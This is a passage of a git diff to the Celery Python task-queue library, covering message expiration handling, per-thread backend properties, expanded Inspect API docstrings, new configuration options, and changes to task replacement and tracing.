+ if isinstance(expires, datetime):
+ expires_s = (maybe_make_aware(expires) - self.now()).total_seconds()
+ else:
+ expires_s = expires
+
+ if expires_s < 0:
+ logger.warning(
+ f"{task_id} has an expiration date in the past ({-expires_s}s ago).\n"
+ "We assume this is intended and so we have set the "
+ "expiration date to 0 instead.\n"
+ "According to RabbitMQ's documentation:\n"
+ "\"Setting the TTL to 0 causes messages to be expired upon "
+ "reaching a queue unless they can be delivered to a "
+ "consumer immediately.\"\n"
+ "If this was unintended, please check the code which "
+ "published this task."
+ )
+ expires_s = 0
+
+ options["expiration"] = expires_s
if not root_id or not parent_id:
parent = self.current_worker_task
@@ -700,9 +770,10 @@ def send_task(self, name, args=None, kwargs=None, countdown=None,
task_id, name, args, kwargs, countdown, eta, group_id, group_index,
expires, retries, chord,
maybe_list(link), maybe_list(link_error),
- reply_to or self.oid, time_limit, soft_time_limit,
+ reply_to or self.thread_oid, time_limit, soft_time_limit,
self.conf.task_send_sent_event,
root_id, parent_id, shadow, chain,
+ ignore_result=ignore_result,
argsrepr=options.get('argsrepr'),
kwargsrepr=options.get('kwargsrepr'),
)
@@ -712,14 +783,14 @@ def send_task(self, name, args=None, kwargs=None, countdown=None,
with self.producer_or_acquire(producer) as P:
with P.connection._reraise_as_library_errors():
- if not ignored_result:
+ if not ignore_result:
self.backend.on_task_call(P, task_id)
amqp.send_task_message(P, name, message, **options)
result = (result_cls or self.AsyncResult)(task_id)
# We avoid using the constructor since a custom result class
# can be used, in which case the constructor may still use
# the old signature.
- result.ignored = ignored_result
+ result.ignored = ignore_result
if add_to_parent:
if not have_parent:
@@ -1022,7 +1093,7 @@ def __exit__(self, *exc_info):
self.close()
def __repr__(self):
- return '<{} {}>'.format(type(self).__name__, appstr(self))
+ return f'<{type(self).__name__} {appstr(self)}>'
def __reduce__(self):
if self._using_v1_reduce:
@@ -1158,15 +1229,28 @@ def oid(self):
# which would not work if each thread has a separate id.
return oid_from(self, threads=False)
+ @property
+ def thread_oid(self):
+ """Per-thread unique identifier for this app."""
+ try:
+ return self._local.oid
+ except AttributeError:
+ self._local.oid = new_oid = oid_from(self, threads=True)
+ return new_oid
+
@cached_property
def amqp(self):
"""AMQP related functionality: :class:`~@amqp`."""
return instantiate(self.amqp_cls, app=self)
- @cached_property
+ @property
def backend(self):
"""Current backend instance."""
- return self._get_backend()
+ try:
+ return self._local.backend
+ except AttributeError:
+ self._local.backend = new_backend = self._get_backend()
+ return new_backend
@property
def conf(self):
@@ -1176,7 +1260,7 @@ def conf(self):
return self._conf
@conf.setter
- def conf(self, d): # noqa
+ def conf(self, d):
self._conf = d
@cached_property
@@ -1238,4 +1322,4 @@ def timezone(self):
return timezone.get_timezone(conf.timezone)
-App = Celery # noqa: E305 XXX compat
+App = Celery # XXX compat
diff --git a/celery/app/control.py b/celery/app/control.py
index 3e5fc65b17c..551ae68bf8b 100644
--- a/celery/app/control.py
+++ b/celery/app/control.py
@@ -2,6 +2,14 @@
Client for worker remote control commands.
Server implementation is in :mod:`celery.worker.control`.
+There are two types of remote control commands:
+
+* Inspect commands: Does not have side effects, will usually just return some value
+ found in the worker, like the list of currently registered tasks, the list of active tasks, etc.
+ Commands are accessible via :class:`Inspect` class.
+
+* Control commands: Performs side effects, like adding a new queue to consume from.
+ Commands are accessible via :class:`Control` class.
"""
import warnings
@@ -61,7 +69,11 @@ def _after_fork_cleanup_control(control):
class Inspect:
- """API for app.control.inspect."""
+ """API for inspecting workers.
+
+ This class provides proxy for accessing Inspect API of workers. The API is
+ defined in :py:mod:`celery.worker.control`
+ """
app = None
@@ -103,42 +115,254 @@ def _request(self, command, **kwargs):
))
def report(self):
+ """Return human readable report for each worker.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: {'ok': REPORT_STRING}}``.
+ """
return self._request('report')
def clock(self):
+ """Get the Clock value on workers.
+
+ >>> app.control.inspect().clock()
+ {'celery@node1': {'clock': 12}}
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: CLOCK_VALUE}``.
+ """
return self._request('clock')
def active(self, safe=None):
- # safe is ignored since 4.0
- # as no objects will need serialization now that we
- # have argsrepr/kwargsrepr.
- return self._request('active')
+ """Return list of tasks currently executed by workers.
+
+ Arguments:
+ safe (Boolean): Set to True to disable deserialization.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``.
+
+ See Also:
+ For ``TASK_INFO`` details see :func:`query_task` return value.
+
+ """
+ return self._request('active', safe=safe)
def scheduled(self, safe=None):
+ """Return list of scheduled tasks with details.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: [TASK_SCHEDULED_INFO,...]}``.
+
+ Here is the list of ``TASK_SCHEDULED_INFO`` fields:
+
+ * ``eta`` - scheduled time for task execution as string in ISO 8601 format
+ * ``priority`` - priority of the task
+ * ``request`` - field containing ``TASK_INFO`` value.
+
+ See Also:
+ For more details about ``TASK_INFO`` see :func:`query_task` return value.
+ """
return self._request('scheduled')
def reserved(self, safe=None):
+ """Return list of currently reserved tasks, not including scheduled/active.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``.
+
+ See Also:
+ For ``TASK_INFO`` details see :func:`query_task` return value.
+ """
return self._request('reserved')
def stats(self):
+ """Return statistics of worker.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: STAT_INFO}``.
+
+ Here is the list of ``STAT_INFO`` fields:
+
+ * ``broker`` - Section for broker information.
+ * ``connect_timeout`` - Timeout in seconds (int/float) for establishing a new connection.
+ * ``heartbeat`` - Current heartbeat value (set by client).
+ * ``hostname`` - Node name of the remote broker.
+ * ``insist`` - No longer used.
+ * ``login_method`` - Login method used to connect to the broker.
+ * ``port`` - Port of the remote broker.
+ * ``ssl`` - SSL enabled/disabled.
+ * ``transport`` - Name of transport used (e.g., amqp or redis)
+ * ``transport_options`` - Options passed to transport.
+ * ``uri_prefix`` - Some transports expects the host name to be a URL.
+ E.g. ``redis+socket:///tmp/redis.sock``.
+ In this example the URI-prefix will be redis.
+ * ``userid`` - User id used to connect to the broker with.
+ * ``virtual_host`` - Virtual host used.
+ * ``clock`` - Value of the workers logical clock. This is a positive integer
+ and should be increasing every time you receive statistics.
+ * ``uptime`` - Numbers of seconds since the worker controller was started
+ * ``pid`` - Process id of the worker instance (Main process).
+ * ``pool`` - Pool-specific section.
+ * ``max-concurrency`` - Max number of processes/threads/green threads.
+ * ``max-tasks-per-child`` - Max number of tasks a thread may execute before being recycled.
+ * ``processes`` - List of PIDs (or thread-id’s).
+ * ``put-guarded-by-semaphore`` - Internal
+ * ``timeouts`` - Default values for time limits.
+ * ``writes`` - Specific to the prefork pool, this shows the distribution
+ of writes to each process in the pool when using async I/O.
+ * ``prefetch_count`` - Current prefetch count value for the task consumer.
+ * ``rusage`` - System usage statistics. The fields available may be different on your platform.
+ From :manpage:`getrusage(2)`:
+
+ * ``stime`` - Time spent in operating system code on behalf of this process.
+ * ``utime`` - Time spent executing user instructions.
+ * ``maxrss`` - The maximum resident size used by this process (in kilobytes).
+ * ``idrss`` - Amount of non-shared memory used for data (in kilobytes times
+ ticks of execution)
+ * ``isrss`` - Amount of non-shared memory used for stack space
+ (in kilobytes times ticks of execution)
+ * ``ixrss`` - Amount of memory shared with other processes
+ (in kilobytes times ticks of execution).
+ * ``inblock`` - Number of times the file system had to read from the disk
+ on behalf of this process.
+ * ``oublock`` - Number of times the file system has to write to disk
+ on behalf of this process.
+ * ``majflt`` - Number of page faults that were serviced by doing I/O.
+ * ``minflt`` - Number of page faults that were serviced without doing I/O.
+ * ``msgrcv`` - Number of IPC messages received.
+ * ``msgsnd`` - Number of IPC messages sent.
+ * ``nvcsw`` - Number of times this process voluntarily invoked a context switch.
+ * ``nivcsw`` - Number of times an involuntary context switch took place.
+ * ``nsignals`` - Number of signals received.
+ * ``nswap`` - The number of times this process was swapped entirely
+ out of memory.
+ * ``total`` - Map of task names and the total number of tasks with that type
+ the worker has accepted since start-up.
+ """
return self._request('stats')
def revoked(self):
+ """Return list of revoked tasks.
+
+ >>> app.control.inspect().revoked()
+ {'celery@node1': ['16f527de-1c72-47a6-b477-c472b92fef7a']}
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: [TASK_ID, ...]}``.
+ """
return self._request('revoked')
def registered(self, *taskinfoitems):
+ """Return all registered tasks per worker.
+
+ >>> app.control.inspect().registered()
+ {'celery@node1': ['task1', 'task1']}
+ >>> app.control.inspect().registered('serializer', 'max_retries')
+ {'celery@node1': ['task_foo [serializer=json max_retries=3]', 'tasb_bar [serializer=json max_retries=3]']}
+
+ Arguments:
+ taskinfoitems (Sequence[str]): List of :class:`~celery.app.task.Task`
+ attributes to include.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: [TASK1_INFO, ...]}``.
+ """
return self._request('registered', taskinfoitems=taskinfoitems)
registered_tasks = registered
def ping(self, destination=None):
+ """Ping all (or specific) workers.
+
+ >>> app.control.inspect().ping()
+ {'celery@node1': {'ok': 'pong'}, 'celery@node2': {'ok': 'pong'}}
+ >>> app.control.inspect().ping(destination=['celery@node1'])
+ {'celery@node1': {'ok': 'pong'}}
+
+ Arguments:
+ destination (List): If set, a list of the hosts to send the
+ command to, when empty broadcast to all workers.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: {'ok': 'pong'}}``.
+
+ See Also:
+ :meth:`broadcast` for supported keyword arguments.
+ """
if destination:
self.destination = destination
return self._request('ping')
def active_queues(self):
+ """Return information about queues from which worker consumes tasks.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: [QUEUE_INFO, QUEUE_INFO,...]}``.
+
+ Here is the list of ``QUEUE_INFO`` fields:
+
+ * ``name``
+ * ``exchange``
+ * ``name``
+ * ``type``
+ * ``arguments``
+ * ``durable``
+ * ``passive``
+ * ``auto_delete``
+ * ``delivery_mode``
+ * ``no_declare``
+ * ``routing_key``
+ * ``queue_arguments``
+ * ``binding_arguments``
+ * ``consumer_arguments``
+ * ``durable``
+ * ``exclusive``
+ * ``auto_delete``
+ * ``no_ack``
+ * ``alias``
+ * ``bindings``
+ * ``no_declare``
+ * ``expires``
+ * ``message_ttl``
+ * ``max_length``
+ * ``max_length_bytes``
+ * ``max_priority``
+
+ See Also:
+ See the RabbitMQ/AMQP documentation for more details about
+ ``queue_info`` fields.
+ Note:
+ The ``queue_info`` fields are RabbitMQ/AMQP oriented.
+ Not all fields applies for other transports.
+ """
return self._request('active_queues')
def query_task(self, *ids):
+ """Return detail of tasks currently executed by workers.
+
+ Arguments:
+ *ids (str): IDs of tasks to be queried.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: {TASK_ID: [STATE, TASK_INFO]}}``.
+
+ Here is the list of ``TASK_INFO`` fields:
+ * ``id`` - ID of the task
+ * ``name`` - Name of the task
+ * ``args`` - Positinal arguments passed to the task
+ * ``kwargs`` - Keyword arguments passed to the task
+ * ``type`` - Type of the task
+ * ``hostname`` - Hostname of the worker processing the task
+ * ``time_start`` - Time of processing start
+ * ``acknowledged`` - True when task was acknowledged to broker
+ * ``delivery_info`` - Dictionary containing delivery information
+ * ``exchange`` - Name of exchange where task was published
+ * ``routing_key`` - Routing key used when task was published
+ * ``priority`` - Priority used when task was published
+ * ``redelivered`` - True if the task was redelivered
+ * ``worker_pid`` - PID of worker processin the task
+
+ """
# signature used be unary: query_task(ids=[id1, id2])
# we need this to preserve backward compatibility.
if len(ids) == 1 and isinstance(ids[0], (list, tuple)):
@@ -146,18 +370,54 @@ def query_task(self, *ids):
return self._request('query_task', ids=ids)
def conf(self, with_defaults=False):
+ """Return configuration of each worker.
+
+ Arguments:
+ with_defaults (bool): if set to True, method returns also
+ configuration options with default values.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: WORKER_CONFIGURATION}``.
+
+ See Also:
+ ``WORKER_CONFIGURATION`` is a dictionary containing current configuration options.
+ See :ref:`configuration` for possible values.
+ """
return self._request('conf', with_defaults=with_defaults)
def hello(self, from_node, revoked=None):
return self._request('hello', from_node=from_node, revoked=revoked)
def memsample(self):
+ """Return sample current RSS memory usage.
+
+ Note:
+ Requires the psutils library.
+ """
return self._request('memsample')
def memdump(self, samples=10):
+ """Dump statistics of previous memsample requests.
+
+ Note:
+ Requires the psutils library.
+ """
return self._request('memdump', samples=samples)
def objgraph(self, type='Request', n=200, max_depth=10):
+ """Create graph of uncollected objects (memory-leak debugging).
+
+ Arguments:
+ n (int): Max number of objects to graph.
+ max_depth (int): Traverse at most n levels deep.
+ type (str): Name of object to graph. Default is ``"Request"``.
+
+ Returns:
+ Dict: Dictionary ``{'filename': FILENAME}``
+
+ Note:
+ Requires the objgraph library.
+ """
return self._request('objgraph', num=n, max_depth=max_depth, type=type)
@@ -171,7 +431,8 @@ def __init__(self, app=None):
self.mailbox = self.Mailbox(
app.conf.control_exchange,
type='fanout',
- accept=['json'],
+ accept=app.conf.accept_content,
+ serializer=app.conf.task_serializer,
producer_pool=lazy(lambda: self.app.amqp.producer_pool),
queue_ttl=app.conf.control_queue_ttl,
reply_queue_ttl=app.conf.control_queue_ttl,
@@ -185,6 +446,7 @@ def _after_fork(self):
@cached_property
def inspect(self):
+ """Create new :class:`Inspect` instance."""
return self.app.subclass_with_self(Inspect, reverse='control.inspect')
def purge(self, connection=None):
@@ -252,8 +514,13 @@ def terminate(self, task_id,
def ping(self, destination=None, timeout=1.0, **kwargs):
"""Ping all (or specific) workers.
+ >>> app.control.ping()
+ [{'celery@node1': {'ok': 'pong'}}, {'celery@node2': {'ok': 'pong'}}]
+ >>> app.control.ping(destination=['celery@node2'])
+ [{'celery@node2': {'ok': 'pong'}}]
+
Returns:
- List[Dict]: List of ``{'hostname': reply}`` dictionaries.
+ List[Dict]: List of ``{HOSTNAME: {'ok': 'pong'}}`` dictionaries.
See Also:
:meth:`broadcast` for supported keyword arguments.
@@ -269,7 +536,7 @@ def rate_limit(self, task_name, rate_limit, destination=None, **kwargs):
task_name (str): Name of task to change rate limit for.
rate_limit (int, str): The rate limit as tasks per second,
or a rate limit string (`'100/m'`, etc.
- see :attr:`celery.task.base.Task.rate_limit` for
+ see :attr:`celery.app.task.Task.rate_limit` for
more information).
See Also:
diff --git a/celery/app/defaults.py b/celery/app/defaults.py
index d0fa9d20b54..596c750f2b5 100644
--- a/celery/app/defaults.py
+++ b/celery/app/defaults.py
@@ -132,6 +132,9 @@ def __repr__(self):
retry_initial_backoff_sec=Option(2, type='int'),
retry_increment_base=Option(2, type='int'),
retry_max_attempts=Option(3, type='int'),
+ base_path=Option('', type='string'),
+ connection_timeout=Option(20, type='int'),
+ read_timeout=Option(120, type='int'),
),
control=Namespace(
queue_ttl=Option(300.0, type='float'),
@@ -175,6 +178,7 @@ def __repr__(self):
db=Option(type='int'),
host=Option(type='string'),
max_connections=Option(type='int'),
+ username=Option(type='string'),
password=Option(type='string'),
port=Option(type='int'),
socket_timeout=Option(120.0, type='float'),
@@ -255,6 +259,7 @@ def __repr__(self):
False, type='bool', old={'celery_eager_propagates_exceptions'},
),
ignore_result=Option(False, type='bool'),
+ store_eager_result=Option(False, type='bool'),
protocol=Option(2, type='int', old={'celery_task_protocol'}),
publish_retry=Option(
True, type='bool', old={'celery_task_publish_retry'},
@@ -267,7 +272,6 @@ def __repr__(self):
type='dict', old={'celery_task_publish_retry_policy'},
),
queues=Option(type='dict'),
- queue_ha_policy=Option(None, type='string'),
queue_max_priority=Option(None, type='int'),
reject_on_worker_lost=Option(type='bool'),
remote_tracebacks=Option(False, type='bool'),
@@ -289,12 +293,18 @@ def __repr__(self):
__old__=OLD_NS_WORKER,
agent=Option(None, type='string'),
autoscaler=Option('celery.worker.autoscale:Autoscaler'),
- concurrency=Option(0, type='int'),
+ cancel_long_running_tasks_on_connection_loss=Option(
+ False, type='bool'
+ ),
+ concurrency=Option(None, type='int'),
consumer=Option('celery.worker.consumer:Consumer', type='string'),
direct=Option(False, type='bool', old={'celery_worker_direct'}),
disable_rate_limits=Option(
False, type='bool', old={'celery_disable_rate_limits'},
),
+ deduplicate_successful_tasks=Option(
+ False, type='bool'
+ ),
enable_remote_control=Option(
True, type='bool', old={'celery_enable_remote_control'},
),
diff --git a/celery/app/log.py b/celery/app/log.py
index d27a85ee559..4ca9bc7ccd1 100644
--- a/celery/app/log.py
+++ b/celery/app/log.py
@@ -41,7 +41,7 @@ def format(self, record):
else:
record.__dict__.setdefault('task_name', '???')
record.__dict__.setdefault('task_id', '???')
- return ColorFormatter.format(self, record)
+ return super().format(record)
class Logging:
@@ -226,7 +226,7 @@ def _detect_handler(self, logfile=None):
logfile = sys.__stderr__ if logfile is None else logfile
if hasattr(logfile, 'write'):
return logging.StreamHandler(logfile)
- return WatchedFileHandler(logfile)
+ return WatchedFileHandler(logfile, encoding='utf-8')
def _has_handler(self, logger):
return any(
@@ -245,6 +245,6 @@ def get_default_logger(self, name='celery', **kwargs):
def already_setup(self):
return self._setup
- @already_setup.setter # noqa
+ @already_setup.setter
def already_setup(self, was_setup):
self._setup = was_setup
diff --git a/celery/app/registry.py b/celery/app/registry.py
index 574457a6cba..707567d1571 100644
--- a/celery/app/registry.py
+++ b/celery/app/registry.py
@@ -36,7 +36,7 @@ def unregister(self, name):
Arguments:
name (str): name of the task to unregister, or a
- :class:`celery.task.base.Task` with a valid `name` attribute.
+ :class:`celery.app.task.Task` with a valid `name` attribute.
Raises:
celery.exceptions.NotRegistered: if the task is not registered.
diff --git a/celery/app/routes.py b/celery/app/routes.py
index 348c8880351..a56ce59e00b 100644
--- a/celery/app/routes.py
+++ b/celery/app/routes.py
@@ -2,8 +2,8 @@
Contains utilities for working with task routers, (:setting:`task_routes`).
"""
+import fnmatch
import re
-import string
from collections import OrderedDict
from collections.abc import Mapping
@@ -23,11 +23,6 @@
__all__ = ('MapRoute', 'Router', 'prepare')
-def glob_to_re(glob, quote=string.punctuation.replace('*', '')):
- glob = ''.join('\\' + c if c in quote else c for c in glob)
- return glob.replace('*', '.+?')
-
-
class MapRoute:
"""Creates a router out of a :class:`dict`."""
@@ -39,7 +34,7 @@ def __init__(self, map):
if isinstance(k, Pattern):
self.patterns[k] = v
elif '*' in k:
- self.patterns[re.compile(glob_to_re(k))] = v
+ self.patterns[re.compile(fnmatch.translate(k))] = v
else:
self.map[k] = v
@@ -126,6 +121,7 @@ def expand_router_string(router):
def prepare(routes):
"""Expand the :setting:`task_routes` setting."""
+
def expand_route(route):
if isinstance(route, (Mapping, list, tuple)):
return MapRoute(route)
diff --git a/celery/app/task.py b/celery/app/task.py
index 86c4e727d49..9a6796e6bb3 100644
--- a/celery/app/task.py
+++ b/celery/app/task.py
@@ -6,9 +6,9 @@
from kombu.exceptions import OperationalError
from kombu.utils.uuid import uuid
-from celery import current_app, group, states
+from celery import current_app, states
from celery._state import _task_stack
-from celery.canvas import signature
+from celery.canvas import _chain, group, signature
from celery.exceptions import (Ignore, ImproperlyConfigured,
MaxRetriesExceededError, Reject, Retry)
from celery.local import class_property
@@ -61,35 +61,39 @@ def _reprtask(task, fmt=None, flags=None):
class Context:
"""Task request variables (Task.request)."""
- logfile = None
- loglevel = None
- hostname = None
- id = None
+ _children = None # see property
+ _protected = 0
args = None
- kwargs = None
- retries = 0
+ callbacks = None
+ called_directly = True
+ chain = None
+ chord = None
+ correlation_id = None
+ delivery_info = None
+ errbacks = None
eta = None
expires = None
- is_eager = False
+ group = None
+ group_index = None
headers = None
- delivery_info = None
+ hostname = None
+ id = None
+ ignore_result = False
+ is_eager = False
+ kwargs = None
+ logfile = None
+ loglevel = None
+ origin = None
+ parent_id = None
+ properties = None
+ retries = 0
reply_to = None
+ replaced_task_nesting = 0
root_id = None
- parent_id = None
- correlation_id = None
+ shadow = None
taskset = None # compat alias to group
- group = None
- group_index = None
- chord = None
- chain = None
- utc = None
- called_directly = True
- callbacks = None
- errbacks = None
timelimit = None
- origin = None
- _children = None # see property
- _protected = 0
+ utc = None
def __init__(self, *args, **kwargs):
self.update(*args, **kwargs)
@@ -104,7 +108,7 @@ def get(self, key, default=None):
return getattr(self, key, default)
def __repr__(self):
- return ''.format(vars(self))
+ return f''
def as_execution_options(self):
limit_hard, limit_soft = self.timelimit or (None, None)
@@ -114,6 +118,7 @@ def as_execution_options(self):
'parent_id': self.parent_id,
'group_id': self.group,
'group_index': self.group_index,
+ 'shadow': self.shadow,
'chord': self.chord,
'chain': self.chain,
'link': self.callbacks,
@@ -124,6 +129,7 @@ def as_execution_options(self):
'headers': self.headers,
'retries': self.retries,
'reply_to': self.reply_to,
+ 'replaced_task_nesting': self.replaced_task_nesting,
'origin': self.origin,
}
@@ -219,9 +225,6 @@ class Task:
#: The result store backend used for this task.
backend = None
- #: If disabled this task won't be registered automatically.
- autoregister = True
-
#: If enabled the task will report its status as 'started' when the task
#: is executed by a worker. Disabled by default as the normal behavior
#: is to not report that level of granularity. Tasks are either pending,
@@ -309,6 +312,7 @@ class Task:
('acks_on_failure_or_timeout', 'task_acks_on_failure_or_timeout'),
('reject_on_worker_lost', 'task_reject_on_worker_lost'),
('ignore_result', 'task_ignore_result'),
+ ('store_eager_result', 'task_store_eager_result'),
('store_errors_even_if_ignored', 'task_store_errors_even_if_ignored'),
)
@@ -455,6 +459,11 @@ def apply_async(self, args=None, kwargs=None, task_id=None, producer=None,
retry_policy (Mapping): Override the retry policy used.
See the :setting:`task_publish_retry_policy` setting.
+ time_limit (int): If set, overrides the default time limit.
+
+ soft_time_limit (int): If set, overrides the default soft
+ time limit.
+
queue (str, kombu.Queue): The queue to route the task to.
This must be a key present in :setting:`task_queues`, or
:setting:`task_create_missing_queues` must be
@@ -499,6 +508,11 @@ def apply_async(self, args=None, kwargs=None, task_id=None, producer=None,
attribute. Trailing can also be disabled by default using the
:attr:`trail` attribute
+ ignore_result (bool): If set to `False` (default) the result
+ of a task will be stored in the backend. If set to `True`
+ the result will not be stored. This can also be set
+ using the :attr:`ignore_result` in the `app.task` decorator.
+
publisher (kombu.Producer): Deprecated alias to ``producer``.
headers (Dict): Message headers to be included in the message.
@@ -675,6 +689,8 @@ def retry(self, args=None, kwargs=None, exc=None, throw=True,
"""
request = self.request
retries = request.retries + 1
+ if max_retries is not None:
+ self.override_max_retries = max_retries
max_retries = self.max_retries if max_retries is None else max_retries
# Not in worker or emulated by (apply/always_eager),
@@ -761,7 +777,13 @@ def apply(self, args=None, kwargs=None,
'callbacks': maybe_list(link),
'errbacks': maybe_list(link_error),
'headers': headers,
- 'delivery_info': {'is_eager': True},
+ 'ignore_result': options.get('ignore_result', False),
+ 'delivery_info': {
+ 'is_eager': True,
+ 'exchange': options.get('exchange'),
+ 'routing_key': options.get('routing_key'),
+ 'priority': options.get('priority'),
+ },
}
tb = None
tracer = build_tracer(
@@ -862,7 +884,7 @@ def replace(self, sig):
.. versionadded:: 4.0
Arguments:
- sig (~@Signature): signature to replace with.
+ sig (Signature): signature to replace with.
Raises:
~@Ignore: This is always raised when called in asynchronous context.
@@ -874,25 +896,42 @@ def replace(self, sig):
raise ImproperlyConfigured(
"A signature replacing a task must not be part of a chord"
)
+ if isinstance(sig, _chain) and not getattr(sig, "tasks", True):
+ raise ImproperlyConfigured("Cannot replace with an empty chain")
+ # Ensure callbacks or errbacks from the replaced signature are retained
if isinstance(sig, group):
- sig |= self.app.tasks['celery.accumulate'].s(index=0).set(
- link=self.request.callbacks,
- link_error=self.request.errbacks,
- )
-
- if self.request.chain:
- for t in reversed(self.request.chain):
- sig |= signature(t, app=self.app)
-
+ # Groups get uplifted to a chord so that we can link onto the body
+ sig |= self.app.tasks['celery.accumulate'].s(index=0)
+ for callback in maybe_list(self.request.callbacks) or []:
+ sig.link(callback)
+ for errback in maybe_list(self.request.errbacks) or []:
+ sig.link_error(errback)
+ # If the replacement signature is a chain, we need to push callbacks
+ # down to the final task so they run at the right time even if we
+ # proceed to link further tasks from the original request below
+ if isinstance(sig, _chain) and "link" in sig.options:
+ final_task_links = sig.tasks[-1].options.setdefault("link", [])
+ final_task_links.extend(maybe_list(sig.options["link"]))
+ # We need to freeze the replacement signature with the current task's
+ # ID to ensure that we don't disassociate it from the existing task IDs
+ # which would break previously constructed results objects.
+ sig.freeze(self.request.id)
+ # Ensure the important options from the original signature are retained
+ replaced_task_nesting = self.request.get('replaced_task_nesting', 0) + 1
sig.set(
chord=chord,
group_id=self.request.group,
group_index=self.request.group_index,
root_id=self.request.root_id,
+ replaced_task_nesting=replaced_task_nesting
)
- sig.freeze(self.request.id)
-
+ # If the task being replaced is part of a chain, we need to re-create
+ # it with the replacement signature - these subsequent tasks will
+ # retain their original task IDs as well
+ for t in reversed(self.request.chain or []):
+ sig |= signature(t, app=self.app)
+ # Finally, either apply or delay the new signature!
if self.request.is_eager:
return sig.apply().get()
else:
@@ -907,7 +946,7 @@ def add_to_chord(self, sig, lazy=False):
Currently only supported by the Redis result backend.
Arguments:
- sig (~@Signature): Signature to extend chord with.
+ sig (Signature): Signature to extend chord with.
lazy (bool): If enabled the new task won't actually be called,
and ``sig.delay()`` must be called manually.
"""
@@ -934,7 +973,22 @@ def update_state(self, task_id=None, state=None, meta=None, **kwargs):
"""
if task_id is None:
task_id = self.request.id
- self.backend.store_result(task_id, meta, state, request=self.request, **kwargs)
+ self.backend.store_result(
+ task_id, meta, state, request=self.request, **kwargs)
+
+ def before_start(self, task_id, args, kwargs):
+ """Handler called before the task starts.
+
+ .. versionadded:: 5.2
+
+ Arguments:
+ task_id (str): Unique id of the task to execute.
+ args (Tuple): Original arguments for the task to execute.
+ kwargs (Dict): Original keyword arguments for the task to execute.
+
+ Returns:
+ None: The return value of this handler is ignored.
+ """
def on_success(self, retval, task_id, args, kwargs):
"""Success handler.
@@ -1038,7 +1092,7 @@ def backend(self):
return backend
@backend.setter
- def backend(self, value): # noqa
+ def backend(self, value):
self._backend = value
@property
@@ -1046,4 +1100,4 @@ def __name__(self):
return self.__class__.__name__
-BaseTask = Task # noqa: E305 XXX compat alias
+BaseTask = Task # XXX compat alias
diff --git a/celery/app/trace.py b/celery/app/trace.py
index bb928f2f20b..7b5b00b8c95 100644
--- a/celery/app/trace.py
+++ b/celery/app/trace.py
@@ -20,7 +20,9 @@
from celery._state import _task_stack
from celery.app.task import Context
from celery.app.task import Task as BaseTask
-from celery.exceptions import Ignore, InvalidTaskError, Reject, Retry
+from celery.exceptions import (BackendGetMetaError, Ignore, InvalidTaskError,
+ Reject, Retry)
+from celery.result import AsyncResult
from celery.utils.log import get_logger
from celery.utils.nodenames import gethostname
from celery.utils.objects import mro_lookup
@@ -46,8 +48,15 @@
'setup_worker_optimizations', 'reset_worker_optimizations',
)
+from celery.worker.state import successful_requests
+
logger = get_logger(__name__)
+#: Format string used to log task receipt.
+LOG_RECEIVED = """\
+Task %(name)s[%(id)s] received\
+"""
+
#: Format string used to log task success.
LOG_SUCCESS = """\
Task %(name)s[%(id)s] succeeded in %(runtime)ss: %(return_value)s\
@@ -159,9 +168,13 @@ def __init__(self, state, retval=None):
def handle_error_state(self, task, req,
eager=False, call_errbacks=True):
- store_errors = not eager
if task.ignore_result:
store_errors = task.store_errors_even_if_ignored
+ elif eager and task.store_eager_result:
+ store_errors = True
+ else:
+ store_errors = not eager
+
return {
RETRY: self.handle_retry,
FAILURE: self.handle_failure,
@@ -266,18 +279,14 @@ def traceback_clear(exc=None):
else:
_, _, tb = sys.exc_info()
- if sys.version_info >= (3, 5, 0):
- while tb is not None:
- try:
- tb.tb_frame.clear()
- tb.tb_frame.f_locals
- except RuntimeError:
- # Ignore the exception raised if the frame is still executing.
- pass
- tb = tb.tb_next
-
- elif (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear()
+ while tb is not None:
+ try:
+ tb.tb_frame.clear()
+ tb.tb_frame.f_locals
+ except RuntimeError:
+ # Ignore the exception raised if the frame is still executing.
+ pass
+ tb = tb.tb_next
def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
@@ -307,7 +316,7 @@ def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
:keyword request: Request dict.
"""
- # noqa: C901
+
# pylint: disable=too-many-statements
# If the task doesn't define a custom __call__ method
@@ -316,28 +325,36 @@ def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
fun = task if task_has_custom(task, '__call__') else task.run
loader = loader or app.loader
- backend = task.backend
ignore_result = task.ignore_result
track_started = task.track_started
track_started = not eager and (task.track_started and not ignore_result)
- publish_result = not eager and not ignore_result
+
+ # #6476
+ if eager and not ignore_result and task.store_eager_result:
+ publish_result = True
+ else:
+ publish_result = not eager and not ignore_result
+
+ deduplicate_successful_tasks = ((app.conf.task_acks_late or task.acks_late)
+ and app.conf.worker_deduplicate_successful_tasks
+ and app.backend.persistent)
+
hostname = hostname or gethostname()
inherit_parent_priority = app.conf.task_inherit_parent_priority
loader_task_init = loader.on_task_init
loader_cleanup = loader.on_process_cleanup
+ task_before_start = None
task_on_success = None
task_after_return = None
+ if task_has_custom(task, 'before_start'):
+ task_before_start = task.before_start
if task_has_custom(task, 'on_success'):
task_on_success = task.on_success
if task_has_custom(task, 'after_return'):
task_after_return = task.after_return
- store_result = backend.store_result
- mark_as_done = backend.mark_as_done
- backend_cleanup = backend.process_cleanup
-
pid = os.getpid()
request_stack = task.request_stack
@@ -385,9 +402,31 @@ def trace_task(uuid, args, kwargs, request=None):
except AttributeError:
raise InvalidTaskError(
'Task keyword arguments is not a mapping')
- push_task(task)
+
task_request = Context(request or {}, args=args,
called_directly=False, kwargs=kwargs)
+
+ redelivered = (task_request.delivery_info
+ and task_request.delivery_info.get('redelivered', False))
+ if deduplicate_successful_tasks and redelivered:
+ if task_request.id in successful_requests:
+ return trace_ok_t(R, I, T, Rstr)
